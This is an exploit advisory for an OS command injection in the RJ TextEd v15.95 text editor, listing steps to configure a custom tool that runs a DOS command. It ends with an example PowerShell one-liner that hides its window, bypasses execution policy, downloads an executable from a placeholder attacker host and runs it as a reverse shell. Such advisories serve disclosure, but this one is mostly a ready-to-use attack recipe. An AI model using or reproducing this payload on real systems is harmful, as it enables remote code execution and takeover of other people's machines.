Exploit Title: RJ TextEd v15.95 - OS Command Injection
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 17.09.2023
Vendor Homepage: https://www.rj-texted.se
Software Link: https://www.fosshub.com/RJ-TextEd.html?dwl=rj-install_x86-15.95.exe
Tested Version: v15.95 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce
- Open RJ TextEd.
- Click on Tools from the top menu.
- Select Configure tools.
- Click on Add to create a new tool.
- Check the Run as DOS Command and capture output box.
- In the Menu text box, type “shell”.
- In the Command box, enter your reverse shell command.
- Click OK, then Apply, and OK again.
- From the top menu, go to Tools and select shell.
- The reverse shell should now be active, connecting back to your listener.
Example of Reverse Shell Command
To set up a reverse shell command, you can use the following in the Command box:
```batch powershell -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-WebRequest -Uri http://attacker_ip:port -OutFile %TEMP%\shell.exe; Start-Process %TEMP%\shell.exe”